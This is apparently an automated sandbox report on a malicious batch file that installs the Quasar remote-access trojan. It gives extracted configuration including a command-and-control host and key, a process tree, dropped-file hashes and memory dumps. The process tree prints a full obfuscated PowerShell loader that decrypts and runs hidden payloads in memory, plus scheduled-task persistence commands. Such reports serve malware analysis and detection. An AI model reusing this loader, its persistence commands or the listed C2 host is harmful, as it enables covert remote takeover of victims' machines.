Analysis

max time kernel: 24s
max time network: 27s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-04-2024 00:56
Static task: static1
General

Target: Uni.bat
Size: 1.8MB
MD5: 14516087f9549022d5582272910428b1
SHA1: 53324370839fa1c07bfa42cf7cb3039513805d42
SHA256: 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512: cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
SSDEEP: 24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy
Malware Config

Extracted
  quasar
  1.4.1
  SLAVE
  uk2.localto.net:39077
  cc0a2b76-665e-4e16-b318-5ee02270fbcd
  encryption_key: D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
  install_name: UpdateHost.exe
  log_directory: Error Logs
  reconnect_delay: 3000
  startup_key: WOS64
  subdirectory: Windows
Signatures

Quasar payload (1 IoC)
  resource: behavioral1/memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmp
  yara_rule: family_quasar

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Process WScript.exe: Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation

Executes dropped EXE (1 IoC)
  pid 1868 UpdateHost.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry class (1 IoC)
  Process powershell.exe: Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings

Suspicious behavior: EnumeratesProcesses (11 IoCs)
  pid 1096 powershell.exe (2 hits), pid 4512 powershell.exe (3 hits), pid 2976 powershell.exe (3 hits), pid 1868 UpdateHost.exe (3 hits)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token: SeDebugPrivilege, pid 1096 powershell.exe
  Token: SeDebugPrivilege, pid 4512 powershell.exe
  pid 4512 powershell.exe then adjusted the following token sequence three times in a row (the third pass stops at token 35): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory (14 IoCs)
  Each of the following parent -> target writes was recorded twice:
  PID 1892 cmd.exe -> 1096 powershell.exe
  PID 1096 powershell.exe -> 4512 powershell.exe
  PID 1096 powershell.exe -> 3624 WScript.exe
  PID 3624 WScript.exe -> 1140 cmd.exe
  PID 1140 cmd.exe -> 2976 powershell.exe
  PID 2976 powershell.exe -> 4300 schtasks.exe
  PID 2976 powershell.exe -> 1868 UpdateHost.exe

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indented by process depth)

[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    Flags: Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      Flags: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_590_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_590.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_590.vbs"
        Flags: Checks computer location settings; Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_590.bat" "
          Flags: Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_590.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_590.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            Flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

          [6] C:\Windows\SYSTEM32\schtasks.exe
              Command line: "schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
              Flags: Creates scheduled task(s)

          [6] C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
              Command line: "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
              Flags: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 5753571cfc81f894ff82dc383591df11
  SHA1: 54dff38cbb912d61f7f2035f97d4dd75cb1a9f04
  SHA256: c729a5004a163727dcc457585cd06d0ddee9c4a80327bd97383d08fd8ce413bf
  SHA512: 83483e2b4a2ffc2a7f7d38160d3e28f0fbeeac30563f57c8d5a6a9b32069a67ddddfb823c9ff1ae8fd057dfc53b8c8e43e58e0ca5907487b472e3152d21e1fb6

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m42l5o2g.4hc.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Roaming\startup_str_590.bat
  Filesize: 1.8MB
  MD5: 14516087f9549022d5582272910428b1
  SHA1: 53324370839fa1c07bfa42cf7cb3039513805d42
  SHA256: 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
  SHA512: cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

C:\Users\Admin\AppData\Roaming\startup_str_590.vbs
  Filesize: 115B
  MD5: fc620f1ab5a3a971335dc5dcec6f7e3e
  SHA1: 2fe328d3fc49cef49dbade3a059325432e4433f3
  SHA256: 2d1813e296fafc65fef73a4ccfa3e48cbe553d1a54fc5334e6436644e29a6543
  SHA512: f1e5598e04bed8789da16da4830a9a86c95db9081ed838a67a05f9423c87246ad9417c0a6b7d5ac0380aa11f4f0c7fd27ba48e1aba2766b878b941bd11bf2b74
Memory dumps:
  memory/1096-42-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB
  memory/1096-15-0x000001FD67480000-0x000001FD675D8000-memory.dmp: 1.3MB
  memory/1096-10-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB
  memory/1096-14-0x000001FD67450000-0x000001FD67458000-memory.dmp: 32KB
  memory/1096-13-0x000001FD650F0000-0x000001FD65100000-memory.dmp: 64KB
  memory/1096-12-0x000001FD650F0000-0x000001FD65100000-memory.dmp: 64KB
  memory/1096-11-0x000001FD650F0000-0x000001FD65100000-memory.dmp: 64KB
  memory/1096-41-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB
  memory/1096-5-0x000001FD671E0000-0x000001FD67202000-memory.dmp: 136KB
  memory/1868-72-0x000001D5C0C40000-0x000001D5C0CB6000-memory.dmp: 472KB
  memory/1868-71-0x000001D5BE760000-0x000001D5BE770000-memory.dmp: 64KB
  memory/1868-70-0x000001D5C09F0000-0x000001D5C0A34000-memory.dmp: 272KB
  memory/1868-60-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB
  memory/2976-52-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB
  memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmp: 3.1MB
  memory/4512-32-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB
  memory/4512-29-0x000001F160490000-0x000001F1604A0000-memory.dmp: 64KB
  memory/4512-28-0x000001F160490000-0x000001F1604A0000-memory.dmp: 64KB
  memory/4512-18-0x000001F160490000-0x000001F1604A0000-memory.dmp: 64KB
  memory/4512-17-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp: 10.8MB